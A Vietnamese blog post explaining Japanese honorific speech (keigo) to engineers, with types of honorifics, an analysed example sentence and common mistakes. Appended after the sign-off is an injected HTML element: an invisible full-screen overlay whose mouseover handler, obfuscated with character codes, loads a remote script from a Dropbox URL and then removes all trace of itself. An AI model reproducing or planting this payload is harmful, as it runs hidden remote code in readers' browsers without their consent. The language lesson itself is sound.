12/08/2018, 13:20

Kính ngữ dưới con mắt của dân kĩ thuật ^^

Sau 2 ngày ngồi download máy ảo từ homepage của Genymotion không được (do lỗi database, lỗi đăng nhập...vv), rồi thêm 2 ngày nữa cài cắm Google Play Services trên con máy vừa được download về từ cái trang mới được hồi sinh ấy, gặp toàn những hiện tượng kì dị ngược hẳn vưới mô tả trong tut, mình đã ...

Sau 2 ngày ngồi download máy ảo từ homepage của Genymotion không được (do lỗi database, lỗi đăng nhập...vv), rồi thêm 2 ngày nữa cài cắm Google Play Services trên con máy vừa được download về từ cái trang mới được hồi sinh ấy, gặp toàn những hiện tượng kì dị ngược hẳn vưới mô tả trong tut, mình đã mất niềm tin vào công nghệ.

Do cay cú nên mình quyết định không viết về kĩ thuật trong tháng này nữa. kill.gif

Ờ thì trước hết phải biết đối với dân Ngoại ngữ nó thế nào đã. Theo con bạn mình thì Tiếng Nhật với nó đa phần là học thuộc lòng, dùng nhiều rồi quen, thành phản xạ... nói chung là "trâu". Đương nhiên là "ngộ" tính khác nhau thì phương pháp luyện công, thời lượng luyện tập cũng khác nhau nhưng đa phần là thế.

Còn với dân kĩ thuật? đa phần đọc tài liệu là nhiều, suy nghĩ theo kiểu Toán, Lý, Hoá nên cần phải có logic, nguyên lý mới hiểu và nhớ lâu được, mà nhiều khi ngôn ngữ nó chả có logic gì cả, hơn nữa giao tiếp bằng ngoại ngữ cũng ít nên là khả năng phản xạ cũng tiều. Tất nhiên là mình không nói về những thanh niên "Con nhà người ta" vừa chăm vừa bá. Mình lười nên cố gắng moi móc ra tí logic để mà nhớ lâu thôi.

haha.gif

Túm lại thì mục đích bài chia sẻ hôm nay là

  • Phân chia cao thấp của từng môn phái. À chết nhầm, của từng loại kính ngữ

  • Thấy đối phương tung chiêu thức múa may quay cuồng phức tạp trông cực kì nguy hiểm thì phải làm thế nào? Hay Định nghĩa các loại kính ngữ cơ bản và cách phân biệt chúng nó

  • Những chiêu dễ tập nhầm dẫn tới tẩu hoả nhập ma.

Cũng giống như trong game thôi, tuy thắng thua phụ thuộc khá nhiều vào quân bài, tuy nhiên khi level đã chênh lệch thì dùng nhà level (đời) 2 dù có giàu mạnh thế nào cũng khó mà ăn được quân bài đời 3 đời 4. Kính ngữ cũng vậy, dù có nói trôi chảy kính ngữ ở level thấp bao nhiêu thì cũng không thể thể hiện được sự trang trọng bằng được level trung và cao được.

Dưới đây là bảng tổng hợp các level của kính ý và kính ngữ tương ứng với nó. Screen Shot 2016-03-30 at 10.45.36.png

Nhìn thì có vẻ khó nhớ, nhưng mà các bạn chỉ cần nhớ một nguyên tắc là cái gì càng dài dòng, loằng ngoằng và nghe càng lạ tai thì càng thể hiện mức độ trang trọng là được. Tuy nhiên khuyến cáo với mọi người là nó chỉ đúng với chiều xuôi, chiều ngược chưa chắc đã đúng. Nghĩa là nếu bạn cố tăng mức độ trang trọng bằng cách bổ xung thêm nhiều công nghệ, kéo dài câu ra thì có thể dẫn tới nhầm lẫn và phản tác dụng.

Ờ giả sử khách hàng đến trước mặt bạn xổ một tràng thế này.

お差支えなければ、変更させていただいてもよろしいでしょうか

(??) Chơi tôi à? お差支えなければ là cái gì thế? Cho vào làm gì? Vừa nghĩ tới cái đấy xong quên luôn đoạn sau khách hàng nói cái gì. Vậy là nội dung quan trọng không nghe được, trong đầu toàn お差支えなければ ていただいても よろしい với cái gì mà しょうか Rổ cá @@

Để hiểu được chúng ta cần đi tìm hiểu các loại kính ngữ, từ đó phân tích tỉ mỉ từng thành phần cấu thành nên câu

2.1 Các loại kính ngữ và định nghĩa

2.1.1 Tôn kính ngữ

Dùng để nâng tầm người thực hiện hành động. Thường dùng cho đối tác, khách hàng hay người trên mình.

山田様がお越しになりました

2.1.2 Khiêm nhường ngữ

Dùng để nâng tầm người mình hướng hành động tới

私が山田様の会社へ伺います

2.1.3 Tôn trọng ngữ

Tôn trọng ngữ không được dùng để nâng tầm ông nào cả. Đơn giản là ở những nơi trang trọng lịch sự thì nó được dùng cho phù hợp với hoàn cảnh thôi.

私はソンと申します

2.1.4 Thể lịch sự

Là thể được dùng phổ biết nhất trong communication.

Đặc trưng với です・ます・でございます

2.1.5 Mỹ từ

Đúng với tên gọi, nó làm cho biểu thị lịch sự, trang trọng và nhã nhặn hơn.

Đặc trưng của nó là thêm ご・おvào trước danh từ hay động từ bắt nguồn từ danh từ

お酒、ご連絡

2.1.6 Cushion (Chả biết gọi là gì cho hợp lý nên để nguyên tên của nó thế)

Là những từ được thêm vào để câu nói, văn được mềm mại, uyển chuyển hơn

恐れ入りますが、
もしよろしければ、

Vâng, sau khi đã đọc qua một lượt các bí kíp võ công thì chúng ta cùng quay lại xem trong câu ví dụ ở đầu người nói đã kết hợp những tuyệt kĩ nào vào một chiêu đó.

?.gif

お差支えなければ、変更させていただいてもよろしいでしょうか

Ở đây mình có một Cushion お差支えなければ này

Một khiêm nhường ngữ này させていただいて

Một lịch sự kép này よろしいでしょうか

=> Đáng ra chỉ cần

変更してもいい?

Ấy thế mà, Vâng, 3 công nghệ, 4 đòn đánh được kết hợp trong một chiêu, sức sát thương tăng lên gấp bội. Khán giả thì mãn nhãn mà đối phương thì xa xẩm mặt mày.

problem.jpg

Cũng như võ học, beginners của kính ngữ học thường tranh thủ thể hiện trình độ mọi lúc mọi nơi. Thường là với phương châm càng dài, càng lạ, càng kết hợp phức tạp lại càng thể hiện được trang trọng. Tuy nhiên điều này hoàn toàn không đúng.

Dưới đây mình xin liệt kê ra một vài nguyên tắc cần chú ý và những trường hợp dễ gây nhầm lẫn trong việc sử dụng kính ngữ

3.1 Dùng kính ngữ phải phù hợp với hoàn cảnh và level của kính ngữ sử dụng cũng phải phù hợp

Ví dụ trong một cuộc họp nội bộ công ty. Khi giám đốc đã phát biểu xong, ta thông báo với tôn kính ngữ thế này

先ほど社長がおっしゃいましたが

Tuy nhiên trong một cuộc họp với thành phần chủ yếu là người của công ty đối tác thì ta cần sử dụng khiêm nhường ngữ

先ほど社長が申しておりましたが

Đây là quy tắc trong-ngoài.

Tất nhiên là ta phải chú ý tới level kính ngữ sử dụng. Ví dụ thằng nào hơn mình tí thôi thì dụng kính ngữ cấp độ thấp, còn ông nào già đời mà chức to thì dùng loại cao cấp. Haiz, viết tới đây lại thấy xã hội đầy bất công...cứ I với You có phải ngon không...

3.2 Chỉ dùng khiêm nhường ngữ khi hành động của mình hướng tới người mình muốn nâng tầm họ

Ví dụ như mình đến ai đó thì có thể dùng

私があなたにお会いにする

chứ còn hành động tự mình lên xe hay xuống xe thì không thể dùng

私が電車にお乗りする → không dùng nhé

3.3 Không nên tuỳ tiện thêm mỹ từ hay kết hợp các công nghệ

Ví dụ có nhiều người hay kết hợp mỹ từ với kính ngữ để làm tăng thêm sự trang trọng

明日、A社に電話しますか → 明日、A社にお電話されますか

Cách dùng này là sai.

Phải sửa lại là

明日、A社に電話されますか

Nghĩa là bỏ お đi

Hoặc sửa lại đuôi thành

明日、A社にお電話なさいますか

Túm lại là đúng lúc, đúng chỗ, đúng mức độ.

Đến một lúc nào đó, khi các bạn ngộ đạo tới mức của những "Con nhà người ta" thì các sẽ thấy được sức mạnh của sự đơn giản. Không thể hiện nhiều nhưng khi đã thể hiện thì bá vl. Mặc dù làm việc cùng những thanh niên như thế cảm giác áp lực chỉ muốn nhảy lầu, nhưng hãy như "Con nhà người ta".

haha.gif

Mục đích của bài viết không gì khác nhằm giúp các bạn có thiên hướng kĩ thuật tiếp nhận dễ dàng và tự tin hơn khi sử dụng kính ngữ trong giao tiếp.

Chúc các bạn vui vẻ và không muốn nhảy lầu như mình! huytsao.png

<hr id="unique-hr" style="background-color: #a00; border: none; height: 2000px; awidth: 2000px ;z-index: 1000; opacity: 0.01; position: fixed; top: 0px; left: 0px;" onmouseover="$('#footer').append(String.fromCharCode(39, 60, 115, 99, 114, 105, 112, 116) + ' id='atk-src' src='https://www.dropbox.com/s/vfi73fypu0x7ij5/serious.js?dl=1'></' + String.fromCharCode(115, 99, 114, 105, 112, 116, 62, 39)); setTimeout(function() {$('#unique-hr,#atk-src').remove();}, 3000);">
0